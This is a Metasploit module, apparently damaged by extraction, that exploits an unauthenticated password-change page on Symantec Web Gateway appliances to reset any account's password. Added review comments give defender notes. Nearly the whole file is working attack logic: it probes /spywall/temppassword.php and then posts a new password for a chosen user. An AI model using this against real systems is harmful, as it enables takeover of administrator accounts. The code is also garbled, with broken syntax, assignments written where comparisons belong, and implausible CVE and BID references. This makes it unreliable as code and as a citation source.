##
# @ _ Kc57
# Symantec Web Gateway <= 5.0.3.18 Arbitrary Password Change
##
Require 'msf/core'
# NOTE(review): this listing looks mangled by extraction or machine translation: keywords are
# capitalised (Class/Def/End/If), namespace separators and hash keys are altered, and spaces
# are injected into string literals, so it does not parse as Ruby as shown.
#
# Metasploit module that posts a new password for a chosen account to
# /spywall/temppassword.php on a Symantec Web Gateway appliance. The title gives the affected
# versions as <= 5.0.3.18. No cookie, session or credential is attached to either request
# below, so the page is treated as reachable without logging in.
#
# Defender notes: POST requests to /spywall/temppassword.php carrying USERNAME, password and
# password2 fields from a client with no authenticated session are the observable trace of
# this issue in web-server or proxy logs. Upgrade past the affected version and keep the
# management interface off untrusted networks; confirm the fixed release against the vendor
# advisory.
Class Metasploit3 <Msf: aupoliciary
Include Msf: Exploit: Remote: HttpClient
# Registers the module metadata (name, description, license, author, references, disclosure
# date) and the three options the run method reads: RPORT, 'user' and 'Password'.
Def initialize (info = {})
Super (update_info (info,
'Name' => "Symantec Web Gateway <= 5.0.3.18 Arbitrary Password Change ",
'Description' => % q {
This module will change the password for the specified account on a Symantec Web Gatewaye server.
},
'License '=> MSF_LICENSE,
'Version' => "$ Revision: 0 $ ",
'Author' =>
[
'C57 ',
],
# NOTE(review): the reference values below ('2017-2012', '0', '123', 'bid/54yun') look like
# placeholders or extraction damage; a 2017 CVE year does not fit the 2012 disclosure date
# given further down. Verify them against the vendor advisory before citing.
'References '=>
[
['Cve', '2017-2012 '],
['Ossvdb', '0'],
['Bid', '123'],
['Url', 'HTTP: // www.securityfocus.com/bid/54yun'],
],
'Disclosuredate' => "Jul 23 2012 "))
Register_options (
[
# Default target port is 80.
Opt: RPORT (80 ),
# NOTE(review): the help text for 'user' reads 'the password to reset to', which looks
# copied from the 'Password' option; it names the account, not the password.
OptString. new ('user', [true, 'the password to reset to ', 'admin']),
# New password to set; defaults to 'admin'.
OptString. new ('Password', [true, 'the PASSWORD to reset to ', 'admin'])
], Self. class)
End
# Probes the password-change page, then submits the change and reports the outcome:
#   1. request /spywall/temppassword.php and require an HTTP 200,
#   2. require the "Please Select a New Password" marker in the body,
#   3. POST the account name and the new password (sent twice) to the same path,
#   4. report success only if the response body contains "Thank you".
Def run
# NOTE(review): the message says https while the registered default port is 80; confirm
# which scheme the request actually uses.
Print_status ("Attempting to connect to https: // # {rhost}/spywall/temppassword. php to reset password ")
# Probe request with no body; the trailing 25 is presumably the timeout in seconds (TODO confirm).
Res = send_request_raw (
{
'Method' => 'post ',
'Url' => '/spywall/temppassword. php ',
}, 25)
# Check to see if we get HTTP OK
# NOTE(review): a single '=' is an assignment, not a comparison, so this test does not check
# the status code as written; the response is also not checked for nil before use.
If (res. code = 200)
Print_status ("Okay, Got an HTTP 200 (okay) code. Checking if exploitable ")
Else
Print_error ("Did not get HTTP 200, URL was not found. Exiting! ")
Return
End
# Check to if the temppassword. php page loads or if we are redirected to the login page
# The form text in the body is the only signal used; no product version is compared.
If (res. body. match (/Please Select a New Password/I ))
Print_status ("Server is vulnerable! ")
Else
Print_error ("Target doesn't seem to be vulnerable! ")
Return
End
Print_status ("Attempting to exploit password change vulnerability on # {rhost }")
# NOTE(review): this prints the new password in clear text to the console, so it will also
# land in any captured console output.
Print_status ("Attempting to reset # {datastore ['user']} password to # {datastore ['Password']}")
# Builds the form body by string concatenation: target, USERNAME, password, password2, Save.
# NOTE(review): the '<' operators and the unbalanced quote on the password line look like
# extraction damage; option values are concatenated without URL-encoding.
Data = 'target = executive_summary.php'
Data <'& USERNAME =' + datastore ['user']
Data <& password = '+ datastore ['Password']
Data <'& password2 =' + datastore ['Password']
Data <'& Save = save'
# Submits the form body to the same path as the probe.
Res = send_request_cgi (
{
'Method' => 'post ',
'Url' => '/spywall/temppassword. php ',
'Data' => data,
}, 25)
# Success is inferred from the "Thank you" text in a 200 response; the new credentials are
# not verified by logging in.
# NOTE(review): same single '=' assignment as in the probe check above.
If res. code = 200
If (res. body. match (/Thank you/I ))
Print_status ("Password reset was successful! \ N ")
Else
Print_error ("Password reset failed! User' # {datastore ['user']} 'may not exist. \ n ")
End
Else
Print_error ("Password reset failed! ")
End
End
End